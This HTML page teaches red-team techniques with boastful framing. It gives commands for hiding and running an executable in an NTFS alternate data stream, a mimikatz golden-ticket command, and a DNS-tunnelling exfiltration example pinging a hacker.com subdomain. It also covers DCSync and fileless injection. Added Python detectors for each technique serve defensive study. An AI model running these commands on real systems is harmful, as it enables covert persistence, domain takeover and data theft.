breaker.html
99 lines (88 loc) · 5.02 KB
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Protocol: BREAKER (GOD TIER)</title>
<link rel="stylesheet" href="style.css">
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet">
</head>
<body class="breaker-theme">
<span class="nav-trigger" onclick="openNav()">☰</span>
<div id="mySidebar" class="sidebar">
<a href="javascript:void(0)" class="closebtn" onclick="closeNav()">×</a>
<a href="index.html">00 // HOME</a>
<a href="#stealth">04 // GHOST PROTOCOLS (STEALTH)</a>
<a href="#ad-kill">05 // ACTIVE DIRECTORY DESTRUCTION</a>
<a href="#exfil">06 // DATA EXFILTRATION</a>
<a href="builder.html">>> SWITCH TO BUILDER</a>
</div>
<div class="container">
<header>
<h1>RED TEAM PROTOCOL</h1>
<p class="tagline">OPERATIONS BEYOND DETECTION</p>
</header>
<h2 id="stealth" class="section-title">04 // Ghost Protocols</h2>
<details>
<summary>NTFS ALTERNATE DATA STREAMS (Hidden in Plain Sight)</summary>
<div class="detail-content">
<p>A little-known Windows feature. A single file can have many hidden "drawers".</p>
<div class="sub-concept">
<h3>How to Hide a .EXE File Inside a .TXT</h3>
<pre><code>type malware.exe > laporan.txt:rahasia.exe</code></pre>
<p>If you inspect <code>laporan.txt</code>, its size looks normal and its content is plain text. But a hidden stream named <code>rahasia.exe</code> is attached to it.</p>
<p><strong>How to Execute:</strong> <code>wmic process call create C:\laporan.txt:rahasia.exe</code></p>
<p>A typical admin will never find it through Windows Explorer.</p>
</div>
</div>
</details>
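<p>Explorer hides streams, but <code>dir /r</code> lists them as <code>file:stream:$DATA</code>, and a process whose image path contains a colon after the drive letter is running out of a stream. The following detection helper is an added example for this page, not code from the original file; its <code>dir /r</code> output is constructed, and the list of executable extensions is an assumption.</p>

```python
import re

# Constructed `dir /r` output (not captured from a real host). `dir /r` lists alternate
# data streams under their host file as name:stream:$DATA; Explorer shows only the 12-byte file.
SAMPLE_DIR_R = r"""
 Directory of C:\Users\Public\Documents

01/01/2024  10:00 AM    <DIR>          .
01/01/2024  10:00 AM    <DIR>          ..
01/01/2024  10:05 AM                12 laporan.txt
                                 5,120 laporan.txt:rahasia.exe:$DATA
01/01/2024  10:07 AM             4,096 invoice.pdf
                                    26 invoice.pdf:Zone.Identifier:$DATA
               2 File(s)          4,108 bytes
"""

# size, host file, stream name, then the literal $DATA stream type
STREAM_RE = re.compile(r"^\s*([\d,]+)\s+(?P<file>[^:]+?):(?P<stream>[^:]+):\$DATA\s*$")

# Zone.Identifier is the mark-of-the-web browsers write on downloads: expected, not suspicious.
EXPECTED_STREAMS = {"zone.identifier"}
# Assumed list of extensions worth flagging when they appear as a stream name.
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta")

# Image path with a second ':' after the drive letter, e.g. C:\laporan.txt:rahasia.exe
STREAM_IMAGE_RE = re.compile(r"^[A-Za-z]:\\.*:[^\\:]+$")


def parse_streams(dir_output):
    """Return every named stream in `dir /r` output as {file, stream, size}."""
    found = []
    for line in dir_output.splitlines():
        m = STREAM_RE.match(line)
        if m:
            found.append({"file": m.group("file"), "stream": m.group("stream"),
                          "size": int(m.group(1).replace(",", ""))})
    return found


def suspicious_streams(dir_output):
    """Drop expected streams and label the rest by why they matter."""
    findings = []
    for s in parse_streams(dir_output):
        if s["stream"].lower() in EXPECTED_STREAMS:
            continue
        if s["stream"].lower().endswith(EXECUTABLE_EXT):
            reason = "executable content hidden in stream"
        else:
            reason = "unexpected named stream"
        findings.append({**s, "reason": reason})
    return findings


def is_stream_image_path(path):
    """True when a process image path (from process-creation logs) points into a stream."""
    return STREAM_IMAGE_RE.match(path) is not None


if __name__ == "__main__":
    for f in suspicious_streams(SAMPLE_DIR_R):
        print(f)
    print(is_stream_image_path(r"C:\laporan.txt:rahasia.exe"))
```

Run the same parser over the real output of <code>dir /r /s</code> on a file share, or use PowerShell's <code>Get-Item -Stream *</code>, which lists the same streams; the image-path check is what to apply to process creation events.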
<details>
<summary>FILELESS MALWARE (Reflective DLL Injection)</summary>
<div class="detail-content">
<p>Old-school malware drops files on the hard disk -> detected by antivirus. God-tier malware lives in RAM.</p>
<p>Technique: load the DLL directly from memory without ever touching disk (write to disk = detected). Uses PowerShell to call the Windows APIs <code>VirtualAlloc</code> and <code>CreateThread</code> manually.</p>
</div>
</details>
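<p>Nothing reaches disk, but the PowerShell that makes those API calls does reach the ScriptBlock log (Event ID 4104) when script block logging is on. The scanner below is an added example, not part of the original file: it scores each logged script on the P/Invoke and memory-allocation indicators the text names. The log entries are constructed, the loader skeleton is a non-functional fragment for the sample only (<code>$bytes</code> is never defined), and the weights and threshold are assumptions to tune.</p>

```python
import re

# Weighted indicators of the in-memory loader pattern: P/Invoke declarations for
# VirtualAlloc/CreateThread, copying bytes into unmanaged memory, and an RWX allocation
# (0x40 = PAGE_EXECUTE_READWRITE). Each indicator counts at most once per script.
INDICATORS = [
    (re.compile(r"\bVirtualAlloc(?:Ex)?\b"), 3, "VirtualAlloc"),
    (re.compile(r"\bCreateThread\b"), 3, "CreateThread"),
    (re.compile(r"\bDllImport\b"), 2, "P/Invoke declaration (DllImport)"),
    (re.compile(r"Marshal\]::Copy"), 2, "Marshal::Copy into unmanaged memory"),
    (re.compile(r"VirtualAlloc\w*\([^)]*0x40\b"), 2, "PAGE_EXECUTE_READWRITE allocation"),
    (re.compile(r"\bAdd-Type\b"), 1, "Add-Type (compiles C# at runtime)"),
]
ALERT_THRESHOLD = 5  # assumed; Add-Type alone (score 1) is common in admin scripts

# Constructed 4104 entry: a skeleton of the pattern, deliberately incomplete.
LOADER_SKELETON = r'''$code = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr a, uint b, IntPtr c, IntPtr d, uint e, IntPtr f);
"@
Add-Type -MemberDefinition $code -Name W32 -Namespace K
$buf = [K.W32]::VirtualAlloc(0, $bytes.Length, 0x3000, 0x40)
[Runtime.InteropServices.Marshal]::Copy($bytes, 0, $buf, $bytes.Length)
[K.W32]::CreateThread(0, 0, $buf, 0, 0, 0)'''

# Constructed ScriptBlock log records (not real captures): one admin one-liner,
# the loader skeleton, and a benign Add-Type use.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS01", "user": r"CORP\alice",
     "script": "Get-ChildItem C:\\Reports | Sort-Object Length -Descending | Select-Object -First 5"},
    {"id": 4104, "host": "WS02", "user": r"CORP\bob", "script": LOADER_SKELETON},
    {"id": 4104, "host": "WS03", "user": r"CORP\carol",
     "script": "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('done')"},
]


def score_script(script):
    """Sum the weights of every indicator present; return (score, matched labels)."""
    score, labels = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(script):
            score += weight
            labels.append(label)
    return score, labels


def alerts(events, threshold=ALERT_THRESHOLD):
    """Return the 4104 entries whose score reaches the threshold."""
    out = []
    for ev in events:
        if ev.get("id") != 4104:
            continue
        score, labels = score_script(ev["script"])
        if score >= threshold:
            out.append({"host": ev["host"], "user": ev["user"],
                        "score": score, "matched": labels})
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print(a)
```

The point of the weighting is that no single token is damning: <code>Add-Type</code> and even <code>DllImport</code> appear in legitimate administration, while the combination of an RWX allocation, a memory copy and a new thread in one script block is rarely anything else.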
<h2 id="ad-kill" class="section-title">05 // Active Directory Kill Chain</h2>
<details>
<summary>GOLDEN TICKET ATTACK (God Mode)</summary>
<div class="detail-content">
<p>If you manage to steal the hash of the <strong>krbtgt</strong> account (Kerberos Ticket Granting Ticket), game over.</p>
<p>You can forge a fake "Golden Ticket". This ticket:</p>
<ul>
<li>Is valid for 10 years (or forever).</li>
<li>Can impersonate ANY user (including Enterprise Admin).</li>
<li>Stays valid even if the real user's password is changed.</li>
</ul>
<div class="code-block">mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-xx /krbtgt:HASH /id:500</div>
</div>
</details>
<details>
<summary>DCSync (Pretending to Be a Domain Controller)</summary>
<div class="detail-content">
<p>Abuses the Windows replication protocol. The hacker asks the real DC to "replicate data" (synchronize password hashes) to the hacker's computer.</p>
<p>No need to log in to the server, no need to plant malware. Just hold replication rights, and pull every password hash in the company.</p>
</div>
</details>
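<p>Both of the attacks above leave traces in the Security log of the domain controllers: a forged ticket still has to be presented to a service, which writes a 4769 event, and a replication request against the domain object writes a 4662 event (provided Directory Service Access auditing is enabled). The triage script below is an added example that is not part of the original file. It applies the usual heuristics: a 4769 for an account that does not exist, an RC4 ticket in a domain expected to use AES, or a realm string that differs from what the real KDC writes; and a 4662 carrying the replication control-access GUIDs from anything other than a domain controller's computer account. The events, the account lists and the realm value are constructed; the GUIDs are the well-known Active Directory values.</p>

```python
import re

# Control access right GUIDs that appear in the 4662 "Properties" field when
# directory replication is requested (well-known Active Directory values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in 4768/4769 events

# Assumed environment facts (constructed): the realm as the KDC writes it, the accounts
# that exist, and the computer accounts that legitimately replicate.
EXPECTED_REALM = "TARGET.LOCAL"
KNOWN_ACCOUNTS = {"administrator", "alice", "svc-backup"}
DC_COMPUTER_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed Security log records reduced to the fields the checks need (not real captures).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@TARGET.LOCAL", "TargetDomainName": "TARGET.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
    {"EventID": 4769, "TargetUserName": "Administrator@TARGET.LOCAL", "TargetDomainName": "target.local",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
    {"EventID": 4769, "TargetUserName": "ghostadmin@TARGET.LOCAL", "TargetDomainName": "TARGET.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.99"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "bob", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def golden_ticket_indicators(ev):
    """Heuristics on a 4769: forged tickets are often RC4, name an account that does not
    exist, or carry a realm string that differs from the one the real KDC writes."""
    if ev.get("EventID") != 4769:
        return []
    hits = []
    account = ev["TargetUserName"].split("@")[0].lower()
    if account not in KNOWN_ACCOUNTS:
        hits.append("account-does-not-exist")
    if ev["TicketEncryptionType"].lower() == RC4_HMAC:
        hits.append("rc4-ticket-in-aes-domain")
    if ev["TargetDomainName"] != EXPECTED_REALM:
        hits.append("realm-string-mismatch")
    return hits


def dcsync_indicators(ev):
    """A 4662 that requests replication rights from anything but a DC computer account."""
    if ev.get("EventID") != 4662:
        return []
    rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(ev["Properties"])
              if g.lower() in REPLICATION_RIGHTS]
    if not rights or ev["SubjectUserName"] in DC_COMPUTER_ACCOUNTS:
        return []
    return ["replication-by-non-dc:" + r for r in rights]


def triage(events):
    """Run both checks over a batch and keep only the events with indicators."""
    findings = []
    for i, ev in enumerate(events):
        hits = golden_ticket_indicators(ev) + dcsync_indicators(ev)
        if hits:
            findings.append({"index": i, "EventID": ev["EventID"],
                             "who": ev.get("TargetUserName") or ev.get("SubjectUserName"),
                             "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

The account-existence check is the one that survives the "valid even after the password is changed" property: the KDC never validated the name, so a ticket for a user that is not in the directory can only have been forged. The single remediation that invalidates every existing golden ticket is resetting the <strong>krbtgt</strong> password twice.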
<h2 id="exfil" class="section-title">06 // Data Exfiltration</h2>
<details>
<summary>DNS TUNNELING (Bypass Firewall)</summary>
<div class="detail-content">
<p>The firewall blocks ports 80 (HTTP), 21 (FTP) and 22 (SSH). But it rarely blocks port 53 (DNS), because the internet needs DNS.</p>
<div class="sub-concept">
<h3>Attack Logic</h3>
<p>You want to send the secret data "PASSWORD123".</p>
<ol>
<li>Encode it as Base64 -> "UEFTU1dPUkQxMjM".</li>
<li>Make a DNS query to a domain the hacker controls: <code>ping UEFTU1dPUkQxMjM.hacker.com</code></li>
<li>The hacker's server receives the query and logs the subdomain. The data has been stolen over the DNS protocol.</li>
</ol>
<p>Very slow, but almost impossible to stop without Deep Packet Inspection.</p>
</div>
</div>
</details>
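<p>Deep Packet Inspection is not the only option: the encoding itself is visible in the resolver's query log, because data carried in labels looks unlike host names (long, high-entropy, and a different label on every query to the same zone). The profiler below is an added example that is not part of the original file; it runs over a constructed query log that contains the page's own example label, and its thresholds are assumptions to tune per environment. Treating the last two labels as the zone is a simplification of the public-suffix handling a production tool would need.</p>

```python
import math
from collections import defaultdict

# Constructed DNS query log (timestamp, client, type, name); not a real capture.
# 10.0.0.99 sends the page's own example label plus more base64-looking labels to one zone.
SAMPLE_DNS_LOG = """\
2024-01-01T10:00:01 10.0.0.15 A www.example.com
2024-01-01T10:00:02 10.0.0.15 A cdn.example.com
2024-01-01T10:00:03 10.0.0.99 A UEFTU1dPUkQxMjM.hacker.com
2024-01-01T10:00:04 10.0.0.99 A c2VjcmV0LWZpbGUtY2h1bmst.hacker.com
2024-01-01T10:00:05 10.0.0.99 A MDAwMS1hYmNkZWZnaGlqa2xtbm9w.hacker.com
2024-01-01T10:00:06 10.0.0.99 A cXJzdHV2d3h5ejAxMjM0NTY3.hacker.com
2024-01-01T10:00:07 10.0.0.15 A mail.example.com
"""


def shannon_entropy(s):
    """Bits per character; encoded data sits well above natural host names."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_queries(log):
    """Yield (client, zone, subdomain). Zone = last two labels (simplification)."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, _qtype, qname = parts
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue
        yield client, ".".join(labels[-2:]).lower(), ".".join(labels[:-2])


def flag_tunnels(log, min_unique=3, min_mean_len=12, min_mean_entropy=3.3):
    """Per (client, zone): many distinct subdomains that are long or high-entropy suggest
    the query names carry data rather than name anything. Thresholds are assumptions."""
    subs = defaultdict(set)
    for client, zone, sub in parse_queries(log):
        subs[(client, zone)].add(sub.replace(".", ""))
    findings = []
    for (client, zone), names in subs.items():
        n = len(names)
        if n < min_unique:
            continue
        mean_len = sum(len(s) for s in names) / n
        mean_ent = sum(shannon_entropy(s) for s in names) / n
        if mean_len >= min_mean_len or mean_ent >= min_mean_entropy:
            findings.append({"client": client, "zone": zone, "unique_subdomains": n,
                             "mean_label_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2),
                             # base64 carries 6 bits per character, so 3 bytes per 4 chars
                             "approx_bytes_carried": sum(len(s) for s in names) * 3 // 4})
    return findings


if __name__ == "__main__":
    for f in flag_tunnels(SAMPLE_DNS_LOG):
        print(f)
```

The byte estimate is what makes the "very slow" remark concrete: four queries moved roughly 68 bytes, so a meaningful exfiltration produces thousands of unique subdomains under one zone, which is exactly the shape this profile keys on. Forcing all clients through an internal resolver that logs queries, and blocking direct outbound UDP/TCP 53 from workstations, is what puts that log in front of the defender in the first place.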
</div>
<script>
function openNav() { document.getElementById("mySidebar").style.width = "320px"; }
function closeNav() { document.getElementById("mySidebar").style.width = "0"; }
</script>
</body>
</html>